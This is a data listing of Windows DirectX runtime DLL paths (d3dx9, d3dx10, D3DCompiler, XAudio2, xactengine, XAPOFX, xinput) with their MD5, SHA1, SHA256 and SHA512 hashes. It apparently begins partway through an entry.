SHA512 d612e2d8a164408ab2d6b962f1b6d3531aed8a0b1aba73291fa5155a6022d078b353512fb3f6fff97ee369918b1802a6103b31316b03db4fa3010b1bf31f35fb

C:\Windows\SysWOW64\xactengine2_9.dll

MD5 46ee68f04a75a1ccf40235ea6f1cba05
SHA1 43a30e195b8d894c69bd857ee377ce7fa6170fa0
SHA256 93a0d8fc38e4e9a301d9e721afbeedc5af40becc0b11a6e7e8e38f08f366ff6e
SHA512 16e4c624e4e74d8c1fd7652ae745a87de3698567faf0cf03651ad87f1f730405fc0d2eca68e4b0ff3c5c526c254aac232f9bd359ddb6563313a8f02db3603fa9

C:\Windows\SysWOW64\xactengine3_0.dll

MD5 8a83673f0ab001870583fde2b004fa59
SHA1 be8d312b359a9b8f9f184d78c93c762cbc46e321
SHA256 887329745c479ce8d3023c969adf66780dd7e51ab536f0a08550ba4c77066c20
SHA512 583c73590d4b90576955783e24149125615b135f5bf5a815674e2546b93a8f89f6c3a286df09257e547bcfa8c0bc399abba59fb64158b411a83f28a4a4feabca

C:\Windows\SysWOW64\xactengine2_7.dll

MD5 7febb8ce2233cbae738b16d42ed29674
SHA1 fdc5682d6aa0ec57b8f3c742fe736d74b3c649cb
SHA256 a43c92af3fbe91dfe2a1d415342631fe64e18c7dd3e16e93b6c78947b68e7bd6
SHA512 73a3c07b13b31d2df1cece720a0268cfdb7ae2a066b9e613f7c4ff0fc37b94bd4f32207149d56e1bcaa5656fd4501b1d136d94e18e97c07a8e793906dbc7927e

C:\Windows\SysWOW64\xactengine3_1.dll

MD5 2e0e25252e1d41752876e9fe12ade175
SHA1 d9de3a83235166a4bbc4bc356419c07aaf3e3f8c
SHA256 088999560171c60129c95f9b541852392602561dce43e4c61a453d48065f52ca
SHA512 a4555cbbde372893c564e1fcd707525c92fbcfb6915354b0062474cc47fe36ef66a3af212c08da117f2f2121698e556633f8c399199344354ce0d4cea4d0a2ca

C:\Windows\SysWOW64\xactengine2_8.dll

MD5 499210c45afeaadee8cf4dcf7d5e570b
SHA1 de5ca60de47c8f54d531b88ea80d9a24a8e87a98
SHA256 15d82e89bea30bf82de6ba0cfbe97eeaf05d1e06bc0133f0d1ee8d0cc41f51f6
SHA512 f76f69bc3b6cb4f92e675eeedbd10a80f0b970d75ea04392484d477a4d02dec670cdadcb90be9eb215c4ad48a90d28347c9104f0835e93b5a9803fd62670536e

C:\Windows\SysWOW64\d3dx9_35.dll

MD5 3ef18b78d17c962f2b71ac1cb7757684
SHA1 2380329c17c7a530075c7572d17592bb3a00c4c2
SHA256 2198022938156b790e9cfb0f7997494b66a11a1ad49b395be58251d635b66b26
SHA512 93e9bff79630ee5897bfb3bc496f778aba160312edcff9f0b8cdb8e8af3d5c7b73a8d95d54ab26cc638a2ff7cfa27153629f9fa8a4a687ae3c83e1178471e720

C:\Windows\SysWOW64\d3dx9_34.dll

MD5 1ca939918ed1b930059b3a882de6f648
SHA1 0c388397620ce0edbb362bb3ab2d4a9f31a56b6d
SHA256 b6f77f06518d35345fb61172b6a13159125ed60c469d28b1a2e07970e9ddf81d
SHA512 d1e09da8551e588b8d5d5837a79da9ae4ddd6a372457d3c341e68e3da07c0c1e84decadea9534cc87ef9ef38c094171004f836e6f74831fd6531ce72aaefeb5e

C:\Windows\SysWOW64\d3dx9_33.dll

MD5 cdb1cd22baff21f48606b3c1a18b000b
SHA1 9315b5db975a34dbebdb4dcae652ba1db01c482c
SHA256 c6b7b2ad7742dde5dd8d1a35fdc1c185e586e551ad9c74d3fb21759cd8ca4da8
SHA512 c5fb24de8f1ee6fc1ed6e74580b5d22599ea4eb6c3589645fff0b15dc8dca051c4917e60fbc00ca86542dd63a8f5e40da92ea77e24826c0c6bdba9b58c36d4db

C:\Windows\SysWOW64\d3dx9_32.dll

MD5 26af232140c88b42d92a88f2198edf6a
SHA1 b62aed3f71d8963227e5021c2222192873ce753b
SHA256 e96693794daa05a75a83c11df2e7b42f2de61567c6ad0b69e353b50f6c88119f
SHA512 54a6a235af4dc3f3c693fba5ac2d487d96c9d7a2bb7deeab35d5a252e723e597226ec84e953625c8808546f91fbcfc42add85076846a63925fd9eabc09dbf935

C:\Windows\SysWOW64\d3dx9_31.dll

MD5 797e24743937d67d69f28f2cf5052ee8
SHA1 7d39afbf94675487a9ff7e41d2dbb8daedf7ad00
SHA256 e2065619fe6eb0034833b1dc0369deb4a6edc3110e38a1132eeafcf430c578a5
SHA512 8804d0d95688a932c7bf7e1a023179de8df3a5436e356b36d803cb9781f3a378adb9fe69d03b28362755b808cbeb2cc718ab920672270de0b954996996328f5e

C:\Windows\SysWOW64\d3dx9_30.dll

MD5 e415862612e65f10d7d888443ecd7594
SHA1 aa8440ec3b5bac6594fd58d97c10c2ab7d419b2d
SHA256 5edeed79f2359527a55b8189cfa8b9b121cd608d44eead905a0f3436938ad532
SHA512 f5de2f9e045c3d579d98b25fbbb7b90aa9ddcada0c6bc4e103e5257394f3cbb7c968d89db61e15b10605561cefdd63456912aa428af5a62cb769ac8c4e5eecba

C:\Windows\SysWOW64\d3dx9_28.dll

MD5 be19b603dfbaa829ee5b7749b3ba97db
SHA1 3d42825b3e7fe5744f67ef145ed47bb524496305
SHA256 f3e391b5f1c1f9637cabf2b812b6f5d65e4776c89d779f506f6b643cc563176d
SHA512 095e8357911c1a06000f5df291bc3cbd80aa3a9672f485fd1f2b9bdb1172d1c7235449485948bee26fcec630d6b80fc927454f9b32cb31c823494c780e0e3df6

C:\Windows\SysWOW64\d3dx9_27.dll

MD5 852edc778a7a50077694f84d8e601234
SHA1 14705b638e1af81ddda5dc52f68c61ebfce5e9e3
SHA256 a70d571cd675c97c9eeb4a234dba1d667ffb54ec3bb14defb36b3e2f605ae257
SHA512 51c4031d98bfe3251a81ea9f4434ce38f077645a40d0ca413e31b6951c384a1635cb040c24ccf1baeef3d5a47d0d18d8b47fef3bcb28570d6e936fcea6f912c2

C:\Windows\SysWOW64\d3dx9_26.dll

MD5 523ab607eef81cc4d909e7febd8a788e
SHA1 2fbf1444daab3312da6b34509763656a28252134
SHA256 8ea96fe01c3c86a36fcb3795ae03eb12034003e335ef475571efaeda17c5bc78
SHA512 791f520533f58cbccded4e7c1f64fc14d20942efe57f32a5ee75eca4107543718eb35ecaf52e6eb3d9112867141271b8c097766fcc3562f016bb612bf840528a

C:\Windows\SysWOW64\d3dx9_25.dll

MD5 5b48fe9d6686f0d54b26a005ace24d1d
SHA1 1c395f6d2aa729a607e69dca73f8205cefd26aa4
SHA256 4c54df27ce84d21b2924e64ff79b13e7876ce85d8e0c9c1d0abd8da73888187a
SHA512 6a4fa549578097ba36495ec210365c27d165065820f0fdad20864a3139949e72da00f9b7c614d07d8950307e596b693ed7a291a5c69cc0f9ba30c5f74d6332f1

C:\Windows\SysWOW64\d3dx9_24.dll

MD5 bc831661963763ac4d504c5cabb1fdd9
SHA1 51b323ea377f9dcd52946f5fe77ceb5673d1592c
SHA256 94ec67763f67932dd4273ef5cc12889a5cef090ffea3ee78a80c7b530272b1b5
SHA512 fe97241d5d9ce298f62ae3295eb9f4091430c8c2c53e967b76e0aed76c3579f8bb07338a0de48e4547c63ab381b3b3d0989a183447b8e47496f35493541295e3

C:\Windows\SysWOW64\d3dx11_43.dll

MD5 8e0bb968ff41d80e5f2c747c04db79ae
SHA1 69b332d78020177a9b3f60cb672ec47578003c0d
SHA256 492e960cb3ccfc8c25fc83f7c464ba77c86a20411347a1a9b3e5d3e8c9180a8d
SHA512 7d71cb5411f239696e77fe57a272c675fe15d32456ce7befb0c2cf3fc567dce5d38a45f4b004577e3dec283904f42ae17a290105d8ab8ef6b70bad4e15c9d506

C:\Windows\SysWOW64\d3dx11_42.dll

MD5 d09ac80a4b5312239852836c84df3392
SHA1 ba838d90a1e74d6b9a57abfc9729dd3b2e7fb192
SHA256 8c8fa8dce19e2f43e82cecd73a268e831a5ce0a16023845f7fa7fcb597772e85
SHA512 69232a47c80f01433716f3a9202af25e1b9a298a2b7b7d23b959e59d9c4ebf329cbe9a9a5bde41c06e978fda062225447114f9ae736920e7bbce8587a9390613

C:\Windows\SysWOW64\d3dx10_43.dll

MD5 20c835843fcec4dedfcd7bffa3b91641
SHA1 5dd1d5b42a0b58d708d112694394a9a23691c283
SHA256 56fcd13650fd1f075743154e8c48465dd68a236ab8960667d75373139d2631bf
SHA512 561eb2bb3a7e562bab0de6372e824f65b310d96d840cdaa3c391969018af6afba225665d07139fc938dcff03f4f8dae7f19de61c9a0eae7c658a32800dc9d123

C:\Windows\SysWOW64\d3dx10_42.dll

MD5 501ac862517c5445742bee8a2b88414e
SHA1 49f3f2df66d357aa84a5e7a0eb368ea595b7d95a
SHA256 46429c4affe041b08a7acfda0e9162ba42de966acb2cbcaf09ef976232073b51
SHA512 08dc13d5ad0a0d2aaca9d3dbfb53304216111da73bf48810df2982650d580757c10c8b9bf80ae5191e06ebaa44b2bf9c244ae141308748c3e7fb9ef6088900ad

C:\Windows\SysWOW64\d3dx10_41.dll

MD5 1aa571774936717ee776dbed51e9edf4
SHA1 98eac7257ab3350504c0a70342b6b24658411f55
SHA256 9f4c15e1f68795727eded4737acc5a1aa85f896cd9e6924fddc9128b48f1bbd6
SHA512 bb47d95d594b249608e323c8ff383c0655a56e9192e1a2f3157e9c18dc7b9baabcf8e6b09d30fef570e0718edf673c56a23df5b5d5c6ec3242ad3d887669127d

C:\Windows\SysWOW64\d3dx10_40.dll

MD5 91b4aad4412bb223b466f3dfb43e86da
SHA1 850aeb2b3ca15158be00faa5c161312cf4a876f0
SHA256 c05787cbf3aa4527baae96a425ceac910090ef48809990a450c33f3cda0e4767
SHA512 413f68d1ad36aa51389da62eb2fe89969e4460ab166ce44943e382fd2d1cad0953979eebb20af58dd51def3fefa1100ea9fe95c05714c36d5322e281cea1a1a2

C:\Windows\SysWOW64\d3dx10_39.dll

MD5 e6c2f1d8b667ddc04cb55b9f0159ef97
SHA1 9dc5c2d54397aeb56deafb63ee34b641f7030ee7
SHA256 613afdb8b44bb3bed945279229d9604a3cd553f8c2b9b091235cbab8cd00de61
SHA512 5cc39f19b6de99bad0be00fcbde9d498e23f29303c6ed4ba79c2b2bc63f259f9b617ecf6ac67beee8a71c03a0e80c29412e0159a5014a43a6168c37835bb0e00

C:\Windows\SysWOW64\d3dx10_38.dll

MD5 a2650b27472c21cdd817eeede65648e1
SHA1 c0e5f70386bb229e289a476f2a95965699ba53fd
SHA256 bf463b7ee2235f351309b5fd790f514acf2b55a4a1f90222f7479024cc28fc34
SHA512 85320f262c10d80e889258a8584648dc20283d1af0467924e8745555c94a8fc056ac609b31d36a898829ad418c9df06047ecfcc644693bd136ccb50ecbd6fe91

C:\Windows\SysWOW64\d3dx10_37.dll

MD5 4a43e9a2b17e4cafa9cb5fec0b5b686b
SHA1 9e28d3d197958e65ab8dcaac91fa55cd1991c3f5
SHA256 61aaf973712f848b24c3e769e3252248ece96db63f206de0ca7ff43d9ed87a51
SHA512 8411bbd130427b690332d222233465bf79426670f565ac3b01a71929dadcfdd18002c54d60981dc1f202e6625f99ab73451805d64518fad9b5a9793407df2d71

C:\Windows\SysWOW64\d3dx10_36.dll

MD5 d9158e78a368b08d9133043eb3058c12
SHA1 d71d6f103bf7433f442f55c355dc74fd4b8a736c
SHA256 aee0248f18dfef8194451a22c69adda1cca38c03ae9aa776114da9d8851d4c38
SHA512 8bcf2da86f708ae84141089f80131244d957e64c6fed0fc39dc688201659cffa7005bfd4cbbb315ee0a60c61e38ead3b4e4fcb3d2f0ecd0386a6fbe486d82bd9

C:\Windows\SysWOW64\d3dx10_35.dll

MD5 f3764552e45880dc49b82f38699aa87c
SHA1 25e347799bb3f36bdee30aa78cd9e59c7faa5add
SHA256 db775655fd923e29509402556f86002dd9aea062cdcdba7073e1057a67b5ce50
SHA512 7e52bbfb4f309b9f5a9632efd3dc28a0509b7d5edf471267f7e794ce8479dd8cefcb29535327a7384bcc25b5331ff87c223fb70fbb5da22fea3c919ba4c5444a

C:\Windows\SysWOW64\d3dx10_34.dll

MD5 5aa9987f2e62b56d7661b6901901f927
SHA1 2cd4e3e70c3b37da134ecfeeedd377d1726d9759
SHA256 330e120d745e1132252df81800362a7ae0b61a9060afc800165ba8a1d55d3fb3
SHA512 af9e39f368b47b1500e5d68a6f234361fdfc29ea31c32f614c5887f124d6097be0b2d8f37287d0cd0b094d3a12e3f5881ea822542a1c85f10566604fd6228988

C:\Windows\SysWOW64\d3dx10_33.dll

MD5 37a8171accf46a9c196054066c28827f
SHA1 886264510372602c2ee0193c5a185d719a61316a
SHA256 b04e2b089656eae01a0071359f9d7fb040dea804c1b9d2379431864174259c2d
SHA512 713b843a35dcfc32caa67c52ce0a32af6f54dfc4c11615d32613017aeeb257fb3f9168443a4288c71209e5d40f2e1b281febcbae6da076d2b57cf01aa3cd78b2

C:\Windows\SysWOW64\d3dx10.dll

MD5 6f34f7405807dcbf0b9bf6811c94c6d9
SHA1 2de04a49825acf76a6a7aa02108337142d30b6ff
SHA256 fd2caa28493ea76021b93641958238b7a933f4f6db1a2070be03cc81d87d8307
SHA512 df623daace6702d25365697b62a4ab7d03d944306521022c6e65e94cf1970b5057da811f10e675c952d93a37abd1b862b8ce8648429780aeb99a4d55fda6aaad

C:\Windows\SysWOW64\d3dcsx_43.dll

MD5 83eba442f07aab8d6375d2eec945c46c
SHA1 c29c20da6bb30be7d9dda40241ca48f069123bd9
SHA256 b46a44b6fce8f141c9e02798645db2ee0da5c69ea71195e29f83a91a355fa2ca
SHA512 288906c8aa8eb4d62440fe84deaa25e7f362dc3644dafc1227e45a71f6d915acf885314531db4757a9bf2e6cb12eaf43b54e9ff0f6a7e3239cabb697b07c25ea

C:\Windows\SysWOW64\D3DCompiler_43.dll

MD5 1c9b45e87528b8bb8cfa884ea0099a85
SHA1 98be17e1d324790a5b206e1ea1cc4e64fbe21240
SHA256 2f23182ec6f4889397ac4bf03d62536136c5bdba825c7d2c4ef08c827f3a8a1c
SHA512 b76d780810e8617b80331b4ad56e9c753652af2e55b66795f7a7d67d6afcec5ef00d120d9b2c64126309076d8169239a721ae8b34784b639b3a3e2bf50d6ee34

C:\Windows\SysWOW64\D3DCompiler_42.dll

MD5 b33b21db610116262d906305ce65c354
SHA1 38eef8d8917351ee9bdff2cc4fbfaefaa16b8231
SHA256 6c976311406c23aa71018d274da0ecdef43b6e3a3b0b01e941a5e8e4e974386c
SHA512 7049726ccbba90d06b3a56e1dbde8196935d4681b5548248cd3e6a8e38183c268152ba2b07eb90823bbe327c02ec946c59abe3562b59e29d9bcff8fe90e0adcc

C:\Windows\SysWOW64\D3DCompiler_41.dll

MD5 781e8b5b6fdb3c9b4e4a4a9fb019960d
SHA1 292b9f02bc2377c6f89b505554394ace161c68c0
SHA256 69ddadf8f5be24f10382706480b55e2492008d102001779f976608e880c65aab
SHA512 718955c983708f3ce5b6796de28658603bb61270ca6f1b3ee01d73ca9a789db326a7998df38cbd6330e69bfe3d9504b0fd351fb7bb18566be6af03fa36b7573a

C:\Windows\SysWOW64\D3DCompiler_40.dll

MD5 3384134eeb8f223178c2eb8323003ec0
SHA1 c8eaef8cbc91f4386e42904dee70abb6ab7304f2
SHA256 f0a6f156d13150de6ebb094233e5ff78581fbdb77bd0ff8d083698c42bc8e13b
SHA512 dafcf4c116d994c17d47d36b1dbc2ba8ca61cadeefa5d770adc391713d2c13ed2b6eb8d2464f4811cb472c8e1eef384ba21d7ad8203ba4e9ef07f33781feaaf9

C:\Windows\SysWOW64\D3DCompiler_39.dll

MD5 c4f1972497fe2ceb7d900938c97fcf91
SHA1 27c1886e7823813ac61c35ea0cd5b72ea0ea7dbc
SHA256 b99b655abc4ec45851cc2acdb7a348e739687200a4fe3be9c35d6738dd61112f
SHA512 8d35dd4000e1d632d0924b594d6ef13454159f8c3b85636f180486ff794b76f8a84d7977e340ef08217f0f68747b593eae0b44824a20c12494007f4a40cc3d00

C:\Windows\SysWOW64\D3DCompiler_38.dll

MD5 103cbfc5591008ad33046e20e8e1eebe
SHA1 4a8bd29d7cbe5652ba58cd6754318a03497d841a
SHA256 ddcaadbdd47bcba02c8d1880d456acc20732d21554977338ae507987ed04046e
SHA512 ddab1a2ab33b224ac3f9ed396415bbbdf96bd59bc6794fe26796ee87691154d5e1ca2abf8bb85e7a9fb6793446bf17f6f6f53b74e69443270f50ce0b85e06b6f

C:\Windows\SysWOW64\D3DCompiler_37.dll

MD5 ea752dbce35045d3c830dc16578cc8ab
SHA1 0a9bdf391ccdd113fde4d10f0afc80d54df01259
SHA256 715876d15b590936e4d32602a764d810650eec134922b32eea742e2fa71791c1
SHA512 3cf5e79062203d39fdb74e789e22405b93de126deda3d698963682d51f264cafe9a91d433312bb7976fa9b50a4798060fcb97b6de7f0dd422eecac2a922e31dd

C:\Windows\SysWOW64\D3DCompiler_36.dll

MD5 fb4299688a0d3a37687c015ac2b9922d
SHA1 a4898d246afbb0ed399e77fa5ff29c99caf912a0
SHA256 f15efcab1780fe7d784a3cd3798f147fa249e81b7ef9a494b85dc7fdab084734
SHA512 664b139754d587dc32820354c1333fe6a5528b07b8bbfaf27374a5da7e86a4c3e7904250976ef3cf8620fd0568c34fa75704a8b1585c382b99d4ee46518617ae

C:\Windows\SysWOW64\D3DCompiler_35.dll

MD5 5b441670a4f5f8bcce76741902b8af56
SHA1 b98df0c54483664ecdc92eccdcdee09d082972d8
SHA256 5a866cdf74f981e783624dafb0e72f133ad9f9b293856d7a18c7558fa357beb1
SHA512 0243deac1124425b65cfbc7d6465bfb09a4849e6c5be3645b808cd3fa487c3044c5b45e9943ee31542a7a47803c02f0b92c05c1e4bee18cf6076641e1c0794f6

C:\Windows\SysWOW64\D3DCompiler_34.dll

MD5 75f206c195bbaca6ef28565b1c0cd75c
SHA1 4687454c58f64f2154f0e99bf5a323f73ca1790c
SHA256 5044a5810fd931339933a8d0c56115a5a5c27d8c0d8e348977e2724a032accf0
SHA512 84c0a8fd3e4293d85e919940f6f24d88fc6fd68f39cffefc34014656fee54256ce581ba408eebf5bf9dac3da9de19f2bf8403521c55881d3877dd64a8e50120f

C:\Windows\System32\xinput1_3.dll

MD5 bfb3091b167550ec6e6454813d3db244
SHA1 87e86a7c783f607697a4880e7e063ab87bf63034
SHA256 756cad002e1553cfa1a91ebe8c1b9380ffabe0b4b1916c4a4db802396ddfbef8
SHA512 ce2ead2480a3942081af4df4baee32de18862b5f0288169b9e8135cc710eb128f9a2b8a36bda87212c53fd4317359349c94d38b5da082638230dcb5669efede9

C:\Windows\System32\xinput1_2.dll

MD5 06f15d3cb1ae0eafa50f595b3ff8d9f5
SHA1 47f8366705c64af17e49c391b11d722e86e11093
SHA256 77055b6a144c4017acd0a8b34520cf9a84be6b9c75db40f7a708b9f4e38aa138
SHA512 c34c3cad5d2011bbe816c7185f020e0b89a2d9f86fcfdc2f12cf8047a5597a850f537c926674ca3b8877e7ea5fb55f493b205794f247de526e42ccc19ee902d2

C:\Windows\System32\xinput1_1.dll

MD5 6f9d3289d8b166e478afff9efa92c42c
SHA1 ae6da454090e2296c6806fda747f4d795f5fe375
SHA256 87c7f921bbf171fa04f7c2adaf8b25d4bf152d12c6b99771da42f3af07f78987
SHA512 1116209a5660d4e5f781cde54b99566f210f2a7a030216c82f1b335b4d7bce424d957cdedc7d87386804fa792a9b9790497c64bd70390f3d3c61fb72f1ea374b

C:\Windows\System32\XAudio2_7.dll

MD5 4f7513ff4de6303088db28dcbcef372c
SHA1 a4113b07de75a83cf1481ea92a3b98e7c1778783
SHA256 f8636ccc37bbfc84107992b60e4226eb7237417112267ed64b08f72983ac4314
SHA512 2cf5ea114546236f55b9cbb49643f719d892eba8649343bc3e72fe08c998e88e26c010232ca27bca255629ae7d0d1e068d6ed1dbd76096b1ed09362f65f5401d

C:\Windows\System32\XAudio2_6.dll

MD5 05e88c8d8e652dff03b469331f474cce
SHA1 a2b70fc91e5e598d1e63ae6f563f4c1f511e2327
SHA256 3240447ef7bab48ec32a19f36e990bbddfdcb0f664fd9f58449f46788b5c32dd
SHA512 144a89c7870fde2bbec8b6fb1959496fb32cfc005d9e02cc1fa78a0749bca926e6523ea4ee6528ca4bd05d94b23622837d2e61d91d1fcbab9a2d8c443d858ca0

C:\Windows\System32\XAudio2_5.dll

MD5 c291aefd47a587ff5f509e2f96613f7d
SHA1 40a908b9043699c2a91e67aa132a678463d620c7
SHA256 36c77312026a3bd5fb928f4fe599a077b08264a82f2863875c2d4619ee133b71
SHA512 45ae65f233179939f8a6ec5eb4526494047cabbc969fb941a5aeaa134e33bee67a9b1609f4aa422c0bad52f0e5a7886da7defd0335bd838b129f6b59f757b48c

C:\Windows\System32\XAudio2_4.dll

MD5 b94f08069efe2f8151def350e526e063
SHA1 d62bccc7cf95295ff235a261613b8f7b6fb386a7
SHA256 df7ddbea32acecc7fd6743002d211506ab75cb1685b4d2b708ea160c610a6f0d
SHA512 412833f57f7b55c57cfbb55748d6576d053604bbdfd48418fbb4577ea04ef844722e7bc0cda3b32bca850565034bf2c9332430d31599ef7ae988831b2b53bd85

C:\Windows\System32\XAudio2_3.dll

MD5 758139a39aecc1b512576275a27c1177
SHA1 2f9a06ce971a10a0e84c2c3b0b4da67c3d271ec7
SHA256 d8e9c006edcf959f414ae7e3ff2e11af0885bc84cedc8249fdc1c5e71cdca8ba
SHA512 39ebd0b277ba324a37cc422454f1cf525e6365ecb1ab1ddb78299ed31c94625431e4079acdbb50385fa97e20fc5eca7cbf321747f3b9792fe5105b0e82bcfdca

C:\Windows\System32\XAudio2_2.dll

MD5 e335df094836ee7030f1b9ce7429e884
SHA1 a3536eb1f08f6ecbc3e15948e67c5f85203a966b
SHA256 9ac81279b1625cbd9a8b59716aac63ef68d722dae586291457d24366a5f4e78b
SHA512 3e6e7244b7b019297299ddade0251dcf30e8c031e5898311595c578f847ce1106904675177345228592d06e3917ad07e4e5d09e9f7a83062cec17fa433085888

C:\Windows\System32\XAudio2_1.dll

MD5 e9c0f926d7c9082a805f4fef81deeb30
SHA1 546c8566475682e7c55e8140e3e17eddd6f6486f
SHA256 7c7c67e2255217d12c5c2afe53556c0f131049be7db4043aed9c1379b9ca9aa1
SHA512 d75fe72fe50476bd3098a6cc5d519e61d4e388359f51715928e792e27dad4d5a03c2e33b899b4083bbc39a315c75afb9f3096944252949c4b62acf8e997f3c55

C:\Windows\System32\XAudio2_0.dll

MD5 29af48f6c894328a58defdc560a70cf3
SHA1 f4961e75dc4878ec52ced7a562312c7ea732be1a
SHA256 eed9479428df33f7a9be5eca9806c2e3412509274638d13032c6c0ed1a3a9ef1
SHA512 8e2c1dea106f2e1a997c7d6cdc8d5eecc69032d4dbb2ad0b9fcfc3a1072d6f0d23c8976d8faabc6f7b2735955f63fca862e386e885308de0eff8fc1a2e467c3d

C:\Windows\System32\XAPOFX1_5.dll

MD5 e9739ae8b2fa28dcd6f2ef5525da8827
SHA1 6edf107e02bf7db7193d1d724cfd2ea5beb3fa8c
SHA256 e47dcf74d50403b376c562e4121e359e5886e42fcc60b3fa8ba53e6826854c49
SHA512 a6d4c71eba226539a692fc36355a279d97a1aa5f4caaa643981653b8d1f3172b52bfaa3942a48b0af71ac39f2bdce568e4686ac8db423ff9edd2f3928a90a6df

C:\Windows\System32\XAPOFX1_4.dll

MD5 a9724eb3d6cc032d0c4ecaff4ad8c17f
SHA1 3f951a9eb2d50cdd7a0d2210391e14ce9acacc63
SHA256 d42e7e91eafce25550f08a63240e23fbe3ddd278b852e36e4eab05bc42f5ec7d
SHA512 ab7cb86abb44e0989047de945f723fb0c42e7a527d19851dd52847b019b13028280a71b7581b2600d942a0576ca4b33029f589bc08934208d4250c2cab3cbe25

C:\Windows\System32\XAPOFX1_3.dll

MD5 37b348a79c4c9b8ab925b18ffd241e96
SHA1 a0b030e5652eafca2cc5d741dbbaac203781ed1d
SHA256 787e10d48d90db50dc155fca53fe8c5c1a383ca24d468733d4b8fe3acf2d0a34
SHA512 20ad359ed0a1fbfacbbba2749eaac9be4e9f416e24cb7ac9dda55c6d2d372fd290781607e5f806b4da3a9d01abef58b979153bc144a8cc8c6d7115166178fe85

C:\Windows\System32\XAPOFX1_2.dll

MD5 2f8f9b707fed2405a787380230cc6fa9
SHA1 55c01dbb39e6fd682ab9f77e4ccec06f5d81f370
SHA256 f16e5795fac7a97fc1ffb5d049c011ee5f0dcdc4c6393664b6a9d94f949fdf0f
SHA512 c2548503380a0fd940167d9b99945b89469076f88fc97b55ef7a7ea5b0a5ff106c3ae935b2bf4e34a0b380c4c946fb99a1a638978079463612b8d14811d00ba2

C:\Windows\System32\XAPOFX1_1.dll

MD5 0f2db378fbe2d124e4d3631b329688ae
SHA1 158194d11db048be5fe12cb6c4abe46e6ea807fa
SHA256 cd03a9ef13123c1b9ce3d92b9e9fd9b9682c9f66c167dd8a326e4bd0acff73f2
SHA512 7621d4c9aa037a7e0e2dd91bb16e5efb496ca0a17e54b1871d58017c02f25340682cda080db3eb2284cec75485b60f7d3f7e06f9a63b7671e8b413e1e2fab7df

C:\Windows\System32\XAPOFX1_0.dll

MD5 0e92d8c0eca74b6d0a55abad53226113
SHA1 9f1ae4dd23913ec43d5c32eaafeca282aafdfb1a
SHA256 671c24f825629381870567d726b7dbc3890d665648043c041eb1100163c49e12
SHA512 e0f254af646d7e48f87f5251bd1aff70d6be3896d757682051f419127c7a5c63cab0b05f7c3b76f50454ddbffcddb5abbe3835cf3e4bcd8afe0e1e24ffc206ea

C:\Windows\System32\xactengine3_7.dll

MD5 bdec09a032db44d9cdb3a0d97224d64e
SHA1 ceed5e9e80626e67ae5be98ba8aa8d63a6731bfd
SHA256 31b7d87c0b7a5e44ec6fc935f11ec9ba949d8161c667f8396896ac92e9bc6745
SHA512 b89ed938e601c8d35e96c75b88b2e4083064df97672a832bc568a17c9fd99d81208967ac09d3ae8ad50948c24993a8319ca90bd215c37e9d15366237ce4416d3

C:\Windows\System32\xactengine3_6.dll

MD5 936dcc640b2991905d909395e03b64f9
SHA1 56da1a5a1cf78c414dda190a3bf55cbb2ae7bbb1
SHA256 6e656d37eadec5acf8ca99f2df37768eaec1c919e616caf3805c0884b2af7c26
SHA512 79a7f824d87aa1caa069d2a90a1bcf2b9b54db0d813f4a3ea212e0742b209e0fca77cc24c5042c7e3d841c3b43942c6ddf45e267fbf1dcc056959dd74f380aed

C:\Windows\System32\xactengine3_5.dll

MD5 51d65be2f794b944cadaf287b34ef603
SHA1 c39d7f266b5a8090b95632dfb620d4066d3c078c
SHA256 65e8efebdf388f3075817f451ed96c4765bf83c0408b84f4f4f71a3f4214da8c
SHA512 65a01ab262f7f7585143b7d2f899c59bd8b201a30dcd87825281ea6c6bd6cb9e169218b4f82ed1dafa31eae291851cec7cae67f9dfaf34f9bc1787dae40bdf51

C:\Windows\System32\xactengine3_3.dll

MD5 84b41fd03cafc5048346b3b2ab92d199
SHA1 40eb2b419b21fec87843e5889ed5a54e1bfa6d56
SHA256 2382bdad39eb8a94194ec4d169203067710d044b31e8f9b1c0571fd6ce32f23d
SHA512 92182aea160eb553be5f50193c8815f9168078886bf5f13f1c52509c67bddd3a0215405e89d005e3c43f3ce6bd55d6730879e509ef374238f3e68c4ce6b00add

C:\Windows\System32\xactengine3_2.dll

MD5 cc8399a9e51b2af1c2c20a26d85eb60e
SHA1 922852e2a199aeb6c4350d4506e135960d3fab55
SHA256 7d0d28dfd60a28283846c9b00f26ba8f98af16d95e81ad577ee0e89d56c2ef50
SHA512 ecd2813be00553e1d6533125f5bad74fa061b3e6f7db0a8eea8833f090734cbded81d8b150e7833d646f6cdd4961a7307f94e0c89c69bcb29c568fb5f006f5cc

C:\Windows\System32\xactengine3_1.dll

MD5 a2a098bf5a8c255a0090818ad8e87b0f
SHA1 6623968f06553163666415163783f7f419c89573
SHA256 444a0b9836b0116edc50e4226c5b6baedd4f92fc099dab21cfc246aba0c24975
SHA512 452468861c2f6e8e4feec9bc75fb030a5966be14ed4e181a48d2a201f70d8bfd469ff9d1469f8eb547f6d6892e8930baa611b3c008f195a7e741a4d082c27a58

C:\Windows\System32\xactengine3_0.dll

MD5 a8b5370b7b61d3777d840da1c64a1c2d
SHA1 5d3bb89c92fbd1f4a541dc37115625a89e7837ba
SHA256 1c953325e2f9e2033065c9898420453ed8b812eb739a7adda5021114a6fc9074
SHA512 5152103052f14fc8613a8d6fbc9fbb1c9e537e9a8420d8e82149208b7ba14c4ff838e2246cd77e65c9b75b686cff142784cd09ba67077bad017ebac82da4af34

C:\Windows\System32\xactengine2_9.dll

MD5 a69c32c2bd01522a088d254342826866
SHA1 3b80ae6ef4c5189f5e56f7e5cf9064821a111f11
SHA256 28ee04a1bd08faebf937367e3c3fae4d20980ba08070382497964ec77951b749
SHA512 8ce8da4459639174767017891caf1a7c079e03dc0e8380e54c13d0e8e7ba4d86ec08ad35afc3059dbbd2b102370e92ec7499469d90f0eccc284c416b3a9cced8

C:\Windows\System32\xactengine2_8.dll

MD5 fa485e76f94b7457767e372f47757733
SHA1 9080a919dcd27544045f51ae03093314c34e6def
SHA256 43a29c6dae6468ca4163795a7555003a71384b8dbe052be0b3bf1d7d4d19cf24
SHA512 32b32f9b2c7b49afdd533c1cb94220204c9006a985810fed9502727fa1045feaf5aa962a5d8e0c57c698a7f34eb1b55cfea8d94414d98409c9098448fc80ba89

C:\Windows\System32\D3DX9_41.dll

MD5 ecddb13bc805b9f3ef3a855e6fd85c69
SHA1 d4f348defccee8e8a0a8e927081dff1f4c803dcc
SHA256 33fd649d5b6e90bd7b7f51d1431ef3501772ae985e320442e5fd750e4368669a
SHA512 4fda199679141fc6c7f77754aa55cd94f6690708916053f98933bb6f40121a371dde61fc8934d8639a564d39b6eb0ec5ab3502fb72c68959de1cbbaf43aa3bc4

